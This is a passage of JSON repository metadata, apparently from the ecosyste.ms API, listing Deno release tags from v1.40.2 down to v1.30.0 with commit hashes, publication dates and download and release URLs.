ithub.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3